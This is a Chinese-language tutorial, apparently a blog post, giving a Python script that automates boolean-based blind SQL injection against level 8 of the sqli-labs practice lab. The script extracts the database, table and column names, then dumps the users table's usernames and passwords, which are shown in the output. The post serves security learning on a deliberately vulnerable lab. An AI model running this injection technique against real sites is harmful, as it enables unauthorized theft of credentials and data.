在打sqli-labs关卡时,手工用来验证可以,但全部搂出数据有些吃力了,可以使用burp suite或者编写自动化工具进行。
本文是用python编写的自动化工具打第8关,详细代码如下。
备注:
1、本文是用docker搭建的sqli-labs,代码中仅作为实现功能的逻辑,并未做符合python代码规范和标准书写。
2、要求会requests模块的使用。
import requests
import string
from test.request_s import ascii
# ascii码的范围是32-126
# 本程序测试sqli-labs第8关
# for循环测试数据库有几位,len不一样的即是数据库位数
def db_len(IP):
for n in range(20):
URL = "http://{}/Less-8/?id=1\' " \
"and length(database())={} --+".format(IP, n)
res = requests.get(url=URL)
# 第一次运行len(res.text)得到的是723,需要提前知道723不是正确的数据库位数
if len(res.text) != 722:
return n
# 测试数据库的数据库名
def db_name(IP, dblen):
dbname = ""
for n in range(9):
# 使用string模块的ascii_lowercase生成a-z的小写字母,大写字母方法是ascii_uppercase
for alpha in string.ascii_lowercase:
URL1 = "http://{}/Less-8/?id=1' " \
"and substr(database(),{},1)='{}' --+".format(IP, n, alpha)
res1 = requests.get(url=URL1)
if len(res1.text) != 722:
dbname = dbname + alpha
return dbname
# 函数查数据库中表的数量,不适合爆大表
def tbl_count(IP):
for n in range(50):
URL = "http://{}/Less-8/?id=1' " \
"and substr((select count(table_name) from information_schema.tables " \
"where table_schema=database()),1)={} --+".format(IP, n)
res = requests.get(url=URL)
if len(res.text) != 722:
return n
# 函数输出表长度
def tbl_len(IP,i):
for n in range(20):
URL2 = "http://{}/Less-8/?id=1' " \
"and length((select table_name from information_schema.tables " \
"where table_schema=database() limit {},1))={} --+".format(IP, i, n)
res = requests.get(url=URL2)
if len(res.text) != 722:
return n
# 函数输入表长度,输出表名
def tbl_name(IP, i, t_len):
tblname = ""
for n in range(t_len + 1):
# 使用string模块的ascii_lowercase生成a-z的小写字母,大写字母方法是ascii_uppercase
for alpha in string.ascii_lowercase:
URL3 = "http://{}/Less-8/?id=1' " \
"and substr((select table_name from information_schema.tables " \
"where table_schema=database() limit {},1),{},1)='{}' --+"\
.format(IP, i,n,alpha)
res1 = requests.get(url=URL3)
if len(res1.text) != 722:
tblname = tblname + alpha
return tblname
# 再补充大写字母,符号
def make_alpha_num():
a2z = string.ascii_lowercase
A2Z = string.ascii_uppercase
numbers = "0123456789"
special_char = ',.'
params = a2z + A2Z + numbers + special_char
return params
# 获取表中所有字段group_concat后的长度
def get_col_len(IP,tbl_name):
for n in range(500):
URL = "http://{}/Less-8/?id=1' " \
"and length((select group_concat(column_name) " \
"from information_schema.columns " \
"where table_schema=database() and table_name='{}'))={} --+"\
.format(IP, tbl_name, n)
res = requests.get(url=URL)
if len(res.text) !=722:
return n
# 获取表所有字段名
def get_columns(IP, tbl_name, col_len):
tbl_columns = ""
for n in range(col_len + 1):
for param in range(32,127):
URL = "http://{}/Less-8/?id=1' " \
"and ascii(substr((select group_concat(column_name) " \
"from information_schema.columns " \
"where table_schema=database() and table_name='{}'),{},1))={} --+"\
.format(IP, tbl_name, n, param)
res = requests.get(url=URL)
if len(res.text) != 722:
ascii2alpha = ascii.ascii_alpha(param)
tbl_columns = tbl_columns + ascii2alpha
return tbl_columns
# 获得表中行数
def get_rows(IP, tbl_name):
for n in range(50):
URL = "http://{}/Less-8/?id=1' " \
"and substr((select count(username) from {}),1)={} --+"\
.format(IP, tbl_name, n)
res = requests.get(url=URL)
if len(res.text) != 722:
return n
# 获得表中数据
def get_tbl_contens(IP, tbl_name):
tbl_contens = ""
# 跑200个循环太慢
for n in range(200):
for param in range(32,127):
URL = "http://{}/Less-8/?id=1' " \
"and ascii(substr((select group_concat(username,':',password) " \
"from {}),{},1))={} --+".format(IP, tbl_name, n, param)
res = requests.get(url=URL)
if len(res.text) !=722:
ascii2alpha = ascii.ascii_alpha(param)
tbl_contens = tbl_contens + ascii2alpha
return tbl_contens
IP = "192.168.101.45"
tbl_name = "users"
col_len = get_col_len(IP, tbl_name)
tbl_columns = get_columns(IP, tbl_name, col_len)
print("{} 表中的字段group_concat组合是:{}".format(tbl_name, tbl_columns))
tbl_rows = get_rows(IP, tbl_name)
print("{}表中共{}行".format(tbl_name, tbl_rows))
tbl_contens = get_tbl_contens(IP, tbl_name)
print("{}表中的内容是:{}".format(tbl_name, tbl_contens)) #运行时间有些长
补充from test.request_s import ascii的代码,主要功能是实现字母和ascii码之间的转换。
# 将字母a转成ascii码
def alpha_ascii(alpha):
alpha2ascii = ord(alpha)
return alpha2ascii
# 将ascii码转成字母
def ascii_alpha(ascii):
ascii2alpha = chr(ascii)
return ascii2alpha
运行结果如下:
users 表中的字段group_concat组合是:id,username,password
users表中共13行
users表中的内容是:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Process finished with exit code 0